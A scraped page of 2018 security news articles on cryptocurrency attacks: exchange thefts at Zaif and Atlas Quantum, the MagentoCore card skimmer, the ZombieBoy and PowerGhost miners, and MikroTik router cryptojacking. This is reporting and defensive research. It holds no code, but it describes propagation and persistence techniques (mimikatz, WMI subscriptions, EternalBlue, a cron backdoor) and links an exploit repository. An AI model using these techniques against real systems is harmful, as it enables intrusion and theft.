- Cryptocurrency -
Last update 09.10.2017 13:51:50
Introduction List Kategorie Subcategory 0 1 2 3 4 5
Crypto-Miners Slip Into Google Play
27.9.2018 securityweek Cryptocurrency
While Google doesn’t allow crypto-currency mining applications in Google Play, some developers have found a way to push such programs to the storefront: by hiding their true purpose.
For more than a year, malicious crypto-mining has spiked globally, fueled by massive increases in crypto-currency prices, and mobile users weren’t spared either, especially those on Android, the more popular mobile operating system at the moment.
Recently, SophosLabs security researchers discovered no less than 25 crypto-mining applications in Google’s official application store for Android, and revealed that over 120,000 users might have downloaded and installed them. The programs are disguised as games, utilities and educational apps.
With only a few lines of code, mining capabilities can be added to any app that uses a WebView embedded browser, the researchers note.
“Monero has been the authors’ choice of crypto-currency for all these apps as it offers sufficient privacy to keep the source, destination, and the amount mined hidden. These apps use CPU throttling to limit CPU usage by mining, and thus avoid the usual pitfalls: device overheating, high battery drain, and overall device sluggishness,” SophosLabs explains.
Of the 25 applications, 11 were found to be preparation apps for standardized tests in the United States, such as the ACT, GRE, or SAT. Published by a single developer account (Gadgetium), the apps contain a HTML page that implements the Coinhive-based miner.
One of the applications (de.uwepost.apaintboxforkids) was using the popular open-source CPU miner XMRig, which was designed to mine several crypto-currencies, Monero included.
Google was notified on the behaviour of these applications in August and has already removed some of them, but many continue to be available for download in Google Play.
Japan Digital Currency Exchange Hacked, Losing $60 Million
22.9.2018 securityweek Cryptocurrency
TOKYO (AP) — Hackers have stolen 6.7 billion yen ($60 million) worth of cryptocurrencies from a Japanese digital currency exchange, the operators said Thursday.
Tech Bureau Corp. said a server for its Zaif exchange was hacked for two hours last week, and some digital currencies got unlawfully relayed from what's called a "hot wallet," or where virtual coins are stored at such exchanges.
The exchange was taken offline until details of the damage could be confirmed, and efforts were underway to get it back working, Tech Bureau said.
Japan has been bullish on virtual money and has set up a system requiring exchanges to be licensed to help protect consumers. The system is also meant to make Japan a global leader in the technology. Bitcoin has been a legal form of payment in Japan since April 2017, and a handful of major retailers here already accept bitcoin payments.
But the recurrence of cryptocurrency heists shows problems persist.
Earlier this year, the Tokyo-based exchange Coincheck reported a 58 billion yen ($547 million) loss of a cryptocurrency called NEM from suspected criminal hacking.
Coincheck, in operation since 2012, had been applying for a government license but had not yet gotten one. That led to industry-wide soul-searching, led by government financial regulators, to prevent such problems.
Zaif got registered with the government last year.
The company said Thursday it had accepted a 5 billion yen ($45 million) offer from Fisco, a Tokyo-based investment company, for a majority stake in Tech Bureau, headquartered in Osaka.
The cryptocurrencies stolen in last week's hack included Bitcoin and Monacoin. Of the stolen money, 2.2 billion yen ($20 million) belonged to the company, and the rest were customers' assets, according to Tech Bureau.
Earlier this year, a glitch at Zaif allowed some people to buy cryptocurrencies for zero yen.
Hackers stole $60 Million worth of cryptocurrencies from Japanese Zaif exchange
21.9.2018 securityaffairs Cryptocurrency
Cybercriminals have stolen 6.7 billion yen ($60 million) worth of cryptocurrencies from the Japanese digital currency exchange Zaif exchange.
According to the Tech Bureau Corp., a Japanese cryptocurrency firm, hackers have compromised its Zaif exchange and have stolen 6.7 billion yen ($60 million) worth of cryptocurrencies, including Bitcoin, Monacoin, and Bitcoin Cash.
The stole digital currencies included roughly 2.2 billion yen belonged to Tech Bureau and 4.5 billion belonged to its clients.
The hacked have taked the control of the exchange for a couple of hours on Sept. 14, and illegally transferred coins form the “hot wallet” of the exchange to wallets under their control.
“Japanese cryptocurrency firm Tech Bureau Corp said about $60 million in digital currencies were stolen from its exchange, highlighting the industry’s vulnerability despite recent efforts by authorities to make it more secure.” reported the Reuters.
Three days later, operators at the exchange noticed server problems and publicly disclosed the hack on Sept. 18.
The Tech Bureau took offline the exchange and sold to Fisco Ltd the majority ownership for a 5 billion yen ($44.59 million) investment that would be used to replace the digital currencies stolen from client accounts.
“Documents seen by Reuters on Thursday showed Japan’s Financial Services Agency would conduct emergency checks on cryptocurrency exchange operators’ management of customer assets, following the theft. FSA officials were not immediately available for comment.” continues the Reuters.
This is the second hack suffered by a Japan’s crypto exchange this year, earlier January Japan-based digital exchange Coincheck was hacked and crooks stole$530 million in digital coins.
Earlier this year, a problem at the Zaif exchange allowed some people to buy cryptocurrencies without paying.
Japan is considered a global leaked in cryptocurrency technologies, the Bitcoin could be used for payment in the country since April 2017 major retailers accept this kind of payments.
Experts believe that the cyber heist will affect the FSA’s ongoing regulatory review of the cryptocurrency industry.
Last year Japan became the first country to regulate cryptocurrency exchanges, they have to register with FSA and required reporting and other responsibilities.
Anyway, the incidents demonstrate that the level of security of exchanges has to be improved.
NSA Leak Fuels Rise in Hacking for Crypto Mining: Report
20.9.2018 securityweek Cryptocurrency
Illicit cryptocurrency mining has been surging over the past year, in part due to a leaked software tool from the US National Security Agency, researchers said Wednesday.
A report by the Cyber Threat Alliance, an association of cybersecurity firms and experts, said it detected a 459 percent increase in the past year of illicit crypto mining -- a technique used by hackers to steal the processing power of computers to create cryptocurrency.
"Activity has gone from a virtually non-exist issue to one that almost universally shows up at the top of our members' threat lists," said a blog post by Neil Jenkins, chief analytic officer for the alliance.
One reason for the sharp rise was the leak last year by a group of hackers known as the Shadow Brokers of "EternalBlue," software developed by the NSA to exploit vulnerabilities in the Windows operating system.
"A patch for EternalBlue has been available for 18 months and even after being exploited in two significant global cyberattacks -- WannaCry and NotPetya -- there are still countless organizations that are being victimized by this exploit, as it's being used by mining malware," Jenkins wrote.
The rise in hacking coincides with growing use of virtual currencies such as bitcoin, ethereum or monero, which are not regulated by any government and are created through solving complex computing problems.
While some cyptocurrency mining is legitimate, hackers have discovered ways to tap into the processing power of unsuspecting computer users to illicitly generate currency.
Jenkins said the rise in malware for crypto mining highlights broader cybersecurity threats.
"Illicit mining is the 'canary in the coal mine' of cybersecurity threats," he said. "If illicit cryptocurrency mining is taking place on your network, then you most likely have worse problems and we should consider the future of illicit mining as a strategic threat."
Hackers can generate gains and use cryptocurrency for other malicious purposes such as purchasing other kinds of malware tools on the "dark web," according to the report.
The researchers said 85 percent of illicit cryptocurrency malware mines monero, with bitcoin representing eight percent.
"Although monero is significantly less valuable than bitcoin, several factors make this the cryptocurrency of choice for malicious actors," the report said.
Monero, according to the report, offers more privacy and anonymity, "which help malicious actors hide both their mining activities and their transactions using the currency," the researchers said.
"Transaction addresses and values are obfuscated by default, making tracking monero incredibly difficult for investigators."
MagentoCore skimmer already infected 7,339 Magento stores
4.9.2018 securityaffairs Cryptocurrency
MagentoCore skimmer already infected 7,339 Magento stores, according to the Willem de Groot who uncovered the campaign, it is the most aggressive to date.
The cybersecurity researcher Willem de Groot has uncovered a massive hacking campaign aimed at Magento stores. The hackers have already infected 7,339 Magento stores with a skimmer script, dubbed MagentoCore, that siphons payment card data from users who purchased on the sites.
Threat actors behind this campaign managed to compromise the websites running Magento and injected the payment card scraper in its source code.
Crooks attempts to access the control panel of Magento stores with brute force attacks.
At the time of writing, querying the PublicWWW service we can verify that the MagentoCore script is currently deployed on 5,214 domains.
The malicious script loads on store checkout pages and steals payment card details provided by the users and send it to a server controlled by the attacker.
Willem de Groot reported that the hacking campaign is involving a skimmer script loaded from the magentocore.net domain.
“A single group is responsible for planting skimmers on 7339 individual stores in the last 6 months. The MagentoCore skimmer is now the most successful to date.” de Groot wrote in a blog post.
MagentoCore credit card stealer Reinfector
The expert found the MagentoCore script on 7,339 Magento stores in the past six months, the campaign is still ongoing and hackers are compromising new Magento stores at a pace of 50 to 60 sites per day.
“The average recovery time is a few weeks, but at least 1450 stores have hosted the MagentoCore.net parasite during the full past 6 months,” de Groot says. “New brands are hijacked at a pace of 50 to 60 stores per day.” continues the expert.
This script records keystrokes from customers and sends them to “magentocore.net” server.
The expert noticed that the malware implements a recovery mechanism, in case of the Magento software, it adds a backdoor to cron.php that will periodically download the malicious code, and, after running, delete itself.
“The victim list contains multi-million dollar, publicly traded companies, which suggests the malware operators make a handsome profit,” de Groot added.
“But the real victims are eventually the customers, who have their card and identity stolen.”
According to Bleeping Computer that quoted Yonathan Klijnsma, Threat Researcher Lead for RiskIQ, the MagentoCore campaign is actually part of a larger card scraping campaign known as MageCart that been active since late 2015.
According to de Groot, currently, 4.2% of all Magento stores are infected with one or more skimmer scripts.
Willem de Groot
http://MagentoCore.net skimmer planted on 7337 stores; removes competing skimmers; periodically resets admin passwords to "how1are2you3" https://gwillem.gitlab.io/2018/08/30/magentocore.net_skimmer_most_aggressive_to_date/ …
12:58 PM - Aug 30, 2018 · The Hague, The Netherlands
See Willem de Groot's other Tweets
Twitter Ads info and privacy
Willem de Groot
4.2% of all Magento stores globally are currently leaking payment and customer data
2:55 PM - Aug 27, 2018
29 people are talking about this
Cryptocurrency Platform Atlas Quantum hacked, 260k users impacted
29.8.2018 securityaffairs Cryptocurrency
The Cryptocurrency Platform Atlas Quantum suffered a security breach, information belonging to more than 260,000 users was stolen by hackers.
Hackers stole information related to over 260,000 users of the Cryptocurrency Platform Atlas Quantum. Exposed data includes customer names, phone numbers, and email addresses, as well as customer account balances.
The platform allows users to trade the cryptocurrency in their accounts on multiple platforms in a way to maximize the profits thanks to its automated arbitrage system.
Atlas over 240,000 users and manages over $30 million in assets.
The company disclosed the security breach with a post on Facebook, it discovered the incident on Sunday evening. Atlas claims that hackers did not steal users’ funds, they only compromised the platform DB.
“We would like to point out that this is not a steal of bitcoins in custody or violation of our accounts in the exchanges. However, our customer base was exposed,” said Chief Executive Officer Rodrigo Marques in the Facebook post. “At the time of the incident, we took immediate steps to protect the database and passwords and private keys remain encrypted.”
Cryptocurrency Platform Atlas Quantum
The company said it has immediately adopted the necessary measures to protect the archive.
“At the time of the incident, we took immediate steps to protect the database and passwords and private keys remain encrypted,” states Atlas.
The company immediately launched an investigation that is still ongoing and temporarily disabled some feature
“Some features of the platform have been temporarily disabled, as a precaution, since we need to ensure security. We will notify you when they are reactivated,” Atlas added.
The popular cybersecurity expert Troy Hunt that operates the HaveIBeenPwned, announced to have already added to its data breach notification service 24% of 261k records.
Users of the Cryptocurrency Platform Atlas Quantum can check whether their accounts and passwords have appeared compromised through the HaveIBeenPwned service.
The incident demonstrates that cryptocurrency marketplaces are becoming privileged targets for hackers.
Hackers Breach Cryptocurrency Platform Atlas Quantum
29.8.2018 securityweek Cryptocurrency
260,000 Impacted in Cryptocurrency Investment Platform Breach
The information of over 260,000 users was stolen after hackers managed to compromise the cryptocurrency investment platform Atlas Quantum.
Through this platform, users can add Bitcoin to their accounts and make profits by trading the cryptocurrency on various platforms. Atlas says it uses an automated arbitrage system to yield profits for customers based on real-time movements in the cryptocurrency market.
The company says it has over 240,000 users in more than 50 countries and over $30 million in assets under its management. In 2017, the platform delivered a cumulative 38% return to investors, Atlas claims.
In an announcement made on Facebook, the company revealed that it became aware of a data breach on Sunday evening and that, although no funds were stolen, its customers database was compromised.
According to a tweet from HaveIBeenPwned, the service that allows users to check whether their accounts and passwords have appeared in any data breaches, the stolen data set had over 261,000 entries.
The leaked information apparently includes affected individuals’ names, phone numbers, and email addresses, as well as their account balances.
“At the time of the incident, we took immediate steps to protect the database and passwords and private keys remain encrypted,” Atlas says.
The investigation into the incident is ongoing, but the company also notes that, in addition to monitoring the affected accounts, they are working to add more protections against fraud.
“Some features of the platform have been temporarily disabled, as a precaution, since we need to ensure security. We will notify you when they are reactivated,” Atlas says.
“The Atlas Quantum data breach suggests that crypto services remain a high-profile target for hackers. Even those who do not actively use the platform to store or invest in crypto may have had their personal data exposed,” Bitglass CTO Anurag Kahol told SecurityWeek in an emailed comment.
“For companies like Atlas, that store mass amounts of user data, reputation and user data security are closely tied. Quickly identifying the cause of this breach and mitigating the threat of further data loss is a critical next step for Atlas and prevention should be top of mind for all companies that store high-value data,” Kahol continued.
The incident should be a wakeup call for cryptocurrency platforms, which are increasingly targeted by cybercriminals, Jonathan Bensen, Director of Product Management/ Acting CISO, Balbix, pointed out to SecurityWeek in an emailed commentary.
Group-IB: The Shadow Market Is Flooded with Cheap Mining Software
10.8.2018 securityaffairs Cryptocurrency
Group-IB is recording new outbreaks of illegal mining (cryptojacking) threats in the networks of commercial and state organizations.
Group-IB, an international company specializing in the prevention of cyberattacks, is recording new outbreaks of illegal mining (cryptojacking) threats in the networks of commercial and state organizations. According to Group-IB’s Threat Intelligence, over a year, the number of shadow-forum ads offering mining software has increased fivefold (H1 2018 vs H1 2017). Group-IB experts say it is a very dangerous tendency to have so many mining Trojans available designed to use other people’s devices and infrastructure for illegitimate generation of cryptocurrency.
Cryptojacking (using computation capacity of a computer or infrastructure for cryptocurrency mining without the knowledge or consent of its owner) is still a comparatively popular method of personal gain, in spite of a clear tendency toward a decrease in the number of incidents of this type of fraud. Growth in the number of such thefts may be caused not only by the growth of mining software offers in Darknet but also by their comparatively low price, which is often less than $0.50.
The low entry barrier to the illegal mining market results in a situation where cryptocurrency is being mined by people without technical expertise or experience with fraudulent schemes. When they gain access to simple tools for making money off hidden cryptocurrency mining, they don’t consider it a crime, all the more so as the Russian legislative environment still leaves enough loopholes to avoid prosecution for such thefts. There are still very few arrests and cases of prosecution for cryptojacking.
One cryptocoin after another: what are the dangers of mining?
Any device (computer, smartphone, IoT, server, etc.) may be used for cryptojacking: that’s why it is not enough to install detection systems only at the workstation level. New types of mining software appear regularly that bypass security systems based on signature alone. A symmetric response to this threat is the analysis of various mining manifestations at the network level. With this end in view, it is necessary to use, among other things, behavioral analysis technologies to detect previously unknown programs and tools.
Group-IB experts warn that mining results not just in direct financial losses due to increased expenditures for electricity. It threatens the stability and continuity of business processes by decelerating corporate systems and increasing depreciation of hardware. Infection of infrastructure with a mining Trojan may result in the failure of corporate apps, networks and systems. Unauthorized external programs working without the knowledge of business owners is fraught with reputational losses, as well as compliance and regulatory risks.
What should we do?
Integrated countermeasures against cryptojacking require the detection of all forms of malicious codes distributed or working in the network, based on a regularly updated database of threats to systems (Threat Intelligence class). Suspicious activity should always be analyzed in a secure isolated environment to ensure the absolute confidentiality of data about infected computers, infrastructure segments and other resources. It is important not only to protect yourself within your own network, but to detect cryptomining tools running java scripts on hacked resources seeking to infect as many victims as possible. There is one more type of fraud that has been gaining popularity recently: the use of traditional insiders. Companies should be able to protect themselves against their own dishonest employees who attempt to increase their incomes at the expense of their employer’s resources.
Group-IB experts record a massive surge of user data leaks form cryptocurrency exchanges
7.8.2018 securityaffairs Cryptocurrency
Group-IB researchers have investigated user data leaks from cryptocurrency exchanges and has analyzed the nature of these incidents.
Security experts from Group-IB, an international company specializing in preventing cyberattacks and developing information security solutions, has investigated user data leaks from cryptocurrency exchanges and has analyzed the nature of these incidents. Within a year, the number of data leaks soared by 369%.
The USA, Russia and China are TOP-3 countries in which registered users became the victims of cyberattacks.
In 2017, when cryptocurrencies were gaining momentum, their record-breaking capitalization and a spike in Bitcoin’s exchange rate led to dozens of attacks on cryptocurrency services. Based on data obtained from the Group-IB Threat Intelligence (cyber intelligence) system, experts from the international company Group-IB have analyzed the theft of 720 user accounts (logins and passwords) from the 19 largest cryptocurrency exchanges
January holidays for hackers: a 689% surge in the number of leaks
The report «2018 Cryptocurrency Exchanges. User Accounts Leaks Analysis»shows a steady increase in the number of compromised user accounts on cryptocurrency exchanges. In 2017, their number increased by 369% compared to 2016. The first month of 2018 set a record: due to growing interest in cryptocurrencies and the blockchain industry, in January the number of incidents jumped by 689% compared to the 2017 monthly average. The USA, Russia, and China are the countries where users are targeted most often. The study has shown that every third victim of the attack is located in the United States.
Toolkit and infrastructure used for attacks
Experts of Group-IB have identified 50 active botnets used for launching cyberattacks on cryptocurrency exchanges users. The infrastructure used by cybercriminals is mainly based in the USA (56.1%), the Netherlands (21.5%), Ukraine (4.3%) and Russia (3.2%).
The attackers use an increasingly wide range of malicious software and update their tools on a regular basis. The most frequently used malicious software includes Trojans such as AZORult and Pony Formgrabber, as well as the Qbot. At the same time, cybercriminals have modified tools previously used for attacks on banks and now successfully use them to hack cryptocurrency exchanges and gain access to users’ personal data.
What makes a successful attack possible?
This is one of the key issues covered in the Group-IB report. The answer is actually quite simple: disregard for information security and underestimating the capabilities of cybercriminals. The first and main cause is that both users and exchanges omit to use two-factor authentication. The second cause is disregard for basic security rules such as the use of complex and unique passwords.
Group-IB has analyzed 720 accounts and found that one out of five users chose a password shorter than 8 characters (see Figure).
Attack as a premonition
Experts of Group-IB draw a bleak conclusion: currently no cryptocurrency exchange, regardless of its size and track record, can guarantee absolute security to its users. At least 5 out of 19 exchanges in question fell victim to targeted cyberattacks widely covered by the media. These are Bitfinex, Bithumb, Bitstamp, HitBTC, Poloniex and, presumably, Huobi. There are various attack vectors: errors in the source code of the software, phishing attacks, unauthorized access to the user database, vulnerabilities related to storage and withdrawal of funds. However, all of them stem from the lack of attention to information security and protection of digital assets.
“Increased fraudulent activity and attention of hacker groups to cryptoindustry, additional functional of malicious software related to cryptocurrencies, as well as the significant amounts of already stolen funds, signals that the industry is not ready to defend itself and protect its users”, says Ruslan Yusufov, the Director of Special Projects at Group-IB. “In 2018 we will see even more incidents. This situation requires prompt and effective response of all stakeholders, including experts in different areas.”
Recommendations of Group-IB experts to users and exchanges
In order to protect one’s funds against crypto-fraud, Group-IB recommends users to be mindful of their passwords (which should contain at least 14 unique symbols), never use the same passwords for different exchanges and always enable the 2FA (two-factor authentication). Experts recommend avoiding the use of public Wi-Fi (at least when carrying out exchange transactions) and paying special attention to one’s “traces” on the social media. For instance, users should not demonstrate the fact that they possess any cryptocurrency.
Recommendations to cryptoexchanges are also of high importance. First of all, they are strongly advised to make two-factor authentication obligatory for all the users and their operations, conduct regular security audits of IT infrastructure and related services, and allocate resources to training and awareness-raising concerning personnel security, starting from top management (founders) and down to rank-and-file employees. To improve the cybersecurity of cryptocurrency exchanges, experts also recommend installing Anti-APT solutions, using Threat Intelligence and implementing anti-fraud solutions, as well as behavioral analysis systems. Specialists also suggest preparing cybersecurity incident response plans which will minimize potential damage.
ZombieBoy, a new Monero miner that allows to earn $1,000 on a monthly basis
6.8.2018 securityaffairs Cryptocurrency
A security researcher discovered a new crypto mining worm dubbed ZombieBoy that leverages several exploits to evade detection.
The security researcher James Quinn has spotted a new strain of crypto mining worm dubbed ZombieBoy that appears to be very profitable and leverages several exploits to evade detection.
The expert called this new malware ZombieBoy because it uses a tool called ZombieBoyTools to drop the first dll, it uses some exploits to spread.
Unlike MassMiner cryptocurrency miner, ZombieBoy leverages WinEggDrop instead of MassScan to search for new hosts to infect.
The cryptocurrency uses Simplified Chinese language, which suggests that its author is a Chinese coder.
The ZombieBoy mine leverages several exploits, including:
CVE-2017-9073, RDP vulnerability on Windows XP and Windows Server 2003
CVE-2017-0143, SMB exploit
CVE-2017-0146, SMB exploit
ZombieBoy also uses both NSA-linked exploits DoublePulsar and EternalBlue exploits to remotely install the main dll. The malware used the ZombieBoyTools to install the two exploits.
Once the has established a backdoor in the target system it could deliver other families of malware, such as ransomware, and keyloggers.
According to Quinn’s, the 64.exe module downloaded by ZombieBoy uses the DoublePulsar exploit to install both an SMB backdoor as well as an RDP backdoor.
The same component uses XMRIG to mine Monero coins at 43 KH/s, that means that users can earn $1,000 on a monthly base at the current rate.
“In addition, 64.exe uses XMRIG to mine for XMR. Prior to shutting down one of its addresses on minexmr.com, ZombieBoy was mining at around 43KH/s. This would earn the attackers slightly over $1,000 per month at current Monero prices.” continues the analysis.
Quinn highlighted that the miner is being updated constantly, he is observing new samples on a daily base.
The malware is able to detect VM and doesn’t run in a virtualized environment to make hard its detection.
Further details including IoCs are reported in the analysis published by the expert.
MikroTik Routers Exploited in Massive Crypto-Mining Campaign
4.8.2018 securityweek Exploit Cryptocurrency
Attackers managed to infect tens of thousands of MikroTik network routers in Brazil with code that injects the CoinHive in-browser crypto-mining script into web traffic.
The attack emerged on July 31, when more than 70,000 MikroTik devices in the country started displaying the same behavior. With all using the same CoinHive site-key, it became apparent that a single actor was behind the attack.
No zero-day was used in this massive attack, as MikroTik, a Latvian router manufacturer, patched the targeted vulnerability back in April 2018. The issue, however, is that the vulnerable devices haven’t been updated in a timely manner.
At the moment, there are “hundreds of thousands of unpatched (and thus vulnerable) devices still out there, and tens of thousands of them are in Brazil alone,” Trustwave’s Simon Kenin, the researcher who analyzed the attack, reveals.
The employed exploit provides the attacker with the ability to read files from a vulnerable MikroTik router and get unauthenticated remote admin access to the device.
As part of this attack, however, the actor didn’t run a malicious executable on the router, but leveraged the device’s functionality to inject the CoinHive script into every web page the user visited.
For that, the attacker created a custom error page with the CoinHive script in it, which resulted in the user landing on that page when encountering any kind of error page while browsing. The attack works in both directions, meaning that users who visit websites behind those infected routers are impacted as well.
Initially, users would encounter the CoinHive script on every visited page, likely because the attacker, who appears to have high understanding of how the MikroTik routers work, might have built code to inject the script in every page.
In addition to modifying the device’s settings to serve the crypto-mining error page, the attacker also created a backdoor on the compromised devices. Kenin also noticed that the script has been updated several times during his investigation.
“The attacker seems to be adding more cleanup commands to leave a smaller footprint and reduce risk of being detected,” the researcher notes.
Kenin also noticed that, although the attack was initially focused on Brazil, MikroTik devices in other countries started being infected as well. In fact, he eventually discovered that over 170,000 routers globally appeared to have the CoinHive site-key.
By targeting MikroTik’s vulnerable carrier-grade router devices, the attackers ensured a broad reach: impacted are not only users behind the routers, but also the visitors of any website hosted behind such a router.
“There are hundreds of thousands of these devices around the globe, in use by ISPs and different organizations and businesses, each device serves at least tens if not hundreds of users daily,” Kenin points out.
While the routers were exploited to deliver a crypto-mining payload, the devices coudl have been exploited for other objectives, Sean Newman, Director Product Management at Corero Network Security, sold SecurityWeek. "From a DDoS perspective, the scale of processing power available in such devices could easily be leveraged for a single attack which could extend to tens of terabits per second, or many smaller attacks if they were used as part of a DDoS for hire service," Newman said.
Hundreds of thousands MikroTik Routers involved in massive Coinhive cryptomining campaign
3.8.2018 securityaffairs Cryptocurrency
Experts uncovered a massive cryptojacking campaign that is targeting MikroTik routers to inject a Coinhive cryptocurrency mining script in the web traffic.
Security experts have uncovered a massive cryptojacking campaign that is targeting MikroTik routers, the hackers aim to change the configuration of the devices to inject a Coinhive cryptocurrency mining script in the users’ web traffic.
The campaign was first spotted by the researcher who goes online with the Twitter handle MalwareHunterBR.
another mass exploitation against @mikrotik_com devices (https://github.com/mrmtwoj/0day-mikrotik …)
1:31 PM - Jul 30, 2018
38 people are talking about this
Twitter Ads info and privacy
According to Catalin Cimpanu from Bleeping Computer, the campaign first started in Brazil, but it is rapidly expanding to other countries targeting MikroTik routers all over the world.
The same campaign was monitored by the experts at Trustwave that confirmed that campaign initially targeted MikroTik routers used by Brazilians.
“On July 31st , just after getting back to the office from my talk at RSA Asia 2018 about how cyber criminals use cryptocurrencies for their malicious activities, I noticed a huge surge of CoinHive in Brazil.” reads the report published by Trustwave.
“After a quick look I saw that this is not your average garden variety website compromise, but that these were all MikroTik network devices.”
The experts noticed that the compromised devices were all using the same CoinHive sitekey, most of them in Brazil, this means that they were targeted by the same attackers.
According to Trustwave the hackers were exploiting a zero-day flaw in the MikroTik routers to inject a copy of the Coinhive library in the traffic passing through the MikroTik router.
“Initial investigation indicates that instead of running a malicious executable on the router itself, which is how the exploit was being used when it was first discovered, the attacker used the device’s functionality in order to inject the CoinHive script into every web page that a user visited.” continues the analysis.
The vulnerability was discovered in April and patched by the vendor in just one day.
Technical details for the MikroTik flaw were publicly disclosed in May, public proof-of-concept (PoC) codes for the issue were published on GitHub.
Trustwave pointed out that many users that weren’t using the MikroTik routers were affected too because Internet providers and big organizations leverage MikroTik routers compromised by hackers.
The experts noticed that the threat actors once discovered to have been spotted by the experts switched tactics and injected the Coinhive script only in error pages returned by the routers.
After the initial phase, the campaign was targeting devices outside Brazil, and it has been estimated that roughly 170,000 MikroTik routers were compromised to inject the Coinhive script. The campaign can potentially compromise over a million of MikroTik routers exposed on the Internet.
“The attacker wisely thought that instead of infecting small sites with few visitors, or finding sophisticated ways to run malware on end user computers, they would go straight to the source; carrier-grade router devices,” concludes the experts.
“Even if this attack only works on pages that return errors, we’re still talking about potentially millions of daily pages for the attacker.”
A mining multitool
2.8.2018 Kaspersky Cryptocurrency
Symbiosis of PowerShell and EternalBlue for cryptocurrency mining
Recently, an interesting miner implementation appeared on Kaspersky Lab’s radar. The malware, which we dubbed PowerGhost, is capable of stealthily establishing itself in a system and spreading across large corporate networks infecting both workstations and servers. This type of hidden consolidation is typical of miners: the more machines that get infected and the longer they remain that way, the greater the attacker’s profits. Therefore, it’s not uncommon to see clean software being infected with a miner; the popularity of the legitimate software serves to promote the malware’s proliferation. The creators of PowerGhost, however, went further and started using fileless techniques to establish the illegal miner within the victim system. It appears the growing popularity and rates of cryptocurrencies have convinced the bad guys of the need to invest in new mining techniques – as our data demonstrates, miners are gradually replacing ransomware Trojans.
Technical description and propagation method
PowerGhost is an obfuscated PowerShell script that contains the core code and the following add-on modules: the actual miner, mimikatz, the libraries msvcp120.dll and msvcr120.dll required for the miner’s operation, a module for reflective PE injection and a shellcode for the EternalBlue exploit.
Fragment of the obfuscated script
The add-on modules encoded in base64
The malicious program uses lots of fileless techniques to remain inconspicuous to the user and undetected by antivirus technologies. The victim machine is infected remotely using exploits or remote administration tools (Windows Management Instrumentation). During infection, a one-line PowerShell script is run that downloads the miner’s body and immediately launches it without writing it to the hard drive.
What the script does after that can be broken down into several stages:
Automatic self-update. PowerGhost checks if a new version is available on the C&C. If there is, it downloads the new version and launches it instead of itself.
Propagation.With the help of mimikatz, the miner obtains the user account credentials from the current machine, uses them to log on and attempts to propagate across the local network by launching a copy of itself via WMI. By “a copy of itself” here and below we mean the one-line script that downloads the miner’s body from the C&C.
PowerGhost also tries to spread across the local network using the now-notorious EternalBlue exploit (MS17-010, CVE-2017-0144).
Escalation of privileges. As the miner spreads via mimikatz and WMI, it may end up on a new machine with user rights. It will then attempt to escalate its privileges in the system with the 32- or 64-bit exploits for MS16-032, MS15-051 and CVE-2018-8120.
Establishing a foothold in the system. PowerGhost saves all the modules as properties of a WMI class. The miner’s body is saved in the form of a one-line PowerShell script in a WMI subscription that activates every 90 minutes.
Payload.Lastly, the script launches the miner by loading a PE file via reflective PE injection.
In one PowerGhost version, we detected a tool for conducting DDoS attacks. The malware writers obviously decided to make some extra money by offering DDoS services.
PowerShell function with the tell-tale name RunDDOS
It’s worth pointing out that this is the only one of the miner’s functions that copies files to the hard drive. This is quite possibly a test tool that will later be replaced with a fileless implementation. Also supporting the assertion that this function was added to this version as an afterthought is the peculiar way the DDoS module is launched: the script downloads two PE modules, logos.png and cohernece.txt. The former is saved to the hard drive as java-log-9527.log and is an executable file for conducting DDoS attacks. The file cohernece.txt is protected with the software protection tool Themida, complete with a check for execution in a virtual environment. If the check does not detect a sandbox, then cohernece.txt launches the file java-log-9527.log for execution. In this curious way, the ready DDoS module was supplemented with a function to check for execution in a virtual environment.
Fragment of disassembled code of the file cohernece.txt
Statistics and geography
Corporate users bore the brunt of the attack: it’s easier for PowerGhost to spread within a company’s local area network.
Geography of infections by the miner
PowerGhost is encountered most often in India, Brazil, Columbia and Turkey.
Kaspersky Lab’s products detect the miner and/or its components with the following verdicts:
E-wallets at nanopool.org and minexmr.com:
Indicators of compromise
Fileless PowerGhost cryptocurrency miner leverages EternalBlue exploit to spread
31.7.2018 securityaffairs Cryptocurrency
Security experts from Kaspersky Lab have spotted a new cryptocurrency miner dubbed PowerGhost that can spread leveraging a fileless infection technique.
The PowerGhost miner targets large corporate networks, infecting both workstations and servers, it employing multiple fileless techniques to evade detection.
“The malware, which we dubbed PowerGhost, is capable of stealthily establishing itself in a system and spreading across large corporate networks infecting both workstations and servers.” reads the analysis published by Kaspersky.
“This type of hidden consolidation is typical of miners: the more machines that get infected and the longer they remain that way, the greater the attacker’s profits. Therefore, it’s not uncommon to see clean software being infected with a miner; the popularity of the legitimate software serves to promote the malware’s proliferation.”
The PowerGhost leverages the NSA-linked EternalBlue exploit to spread, it is obfuscated PowerShell script containing malware’s core code, along with many other add-on modules such as the miner, miner libraries, the Mimikatz post-exploitation too, a module for reflective PE injection, and a shellcode for the EternalBlue exploit.
The victim system is infected remotely using exploits or remote administration tools (Windows Management Instrumentation), experts discovered that during the infection phase a one-line PowerShell script is executed to drop the core of the miner component and execute it, the entire process in the memory of the system.
The first thing that the malware does it to check the command and control (C&C) server and, if a new version is available, it downloads and executes it.
Then the malware uses the Mimikatz tool to get the user account credentials from the machine and use it to attempt lateral movements inside the target network.
“Propagation.With the help of mimikatz, the miner obtains the user account credentials from the current machine, uses them to log on and attempts to propagate across the local network by launching a copy of itself via WMI. By “a copy of itself” here and below we mean the one-line script that downloads the miner’s body from the C&C.” continues the analysis.
“PowerGhost also tries to spread across the local network using the now-notorious EternalBlue exploit (CVE-2017-0144).”
Once infected a machine, the PowerGhost attempts to escalate privileges by using various exploits such as the one for CVE-2018-8120.
In order to establish a foothold in the infected system, the PowerGhost saves all the modules as properties of a WMI class, while miner main body is saved as a one-line PowerShell script in a WMI subscription that activates every 90 minutes.
The script executes the miner by loading a PE file via reflective PE injection.
Most of the PowerGhost infections were observed in India, Brazil, Columbia, and Turkey.
Experts discovered also a PowerGhost version that implements DDoS capability, a circumstance that leads Kaspersky into believing that authors attempted to create a DDoS-for-hire service.
Further details, including Indicators of Compromise (IoCs) are reported in the analysis published by Kaspersky.
Stealthy Crypto-Miner Has Worm-Like Spreading Mechanism
30.7.2018 securityweek Cryptocurrency
The PowerGhost crypto-miner is capable of remaining undetected on infected systems, and can spread on its own by leveraging a fileless infection technique, Kaspersky Lab has discovered.
The miner is targeting both workstations and servers, which allows it to spread across large corporate networks. The threat, Kaspersky discovered, leverages the National Security Agency-linked EternalBlue exploit to spread.
The new threat proves once again that the growing popularity and rates of cryptocurrencies have determined cyber-criminals to adopt ingenious mining techniques and to gradually drop ransomware Trojans as the malware of choice in favor of crypto-miners.
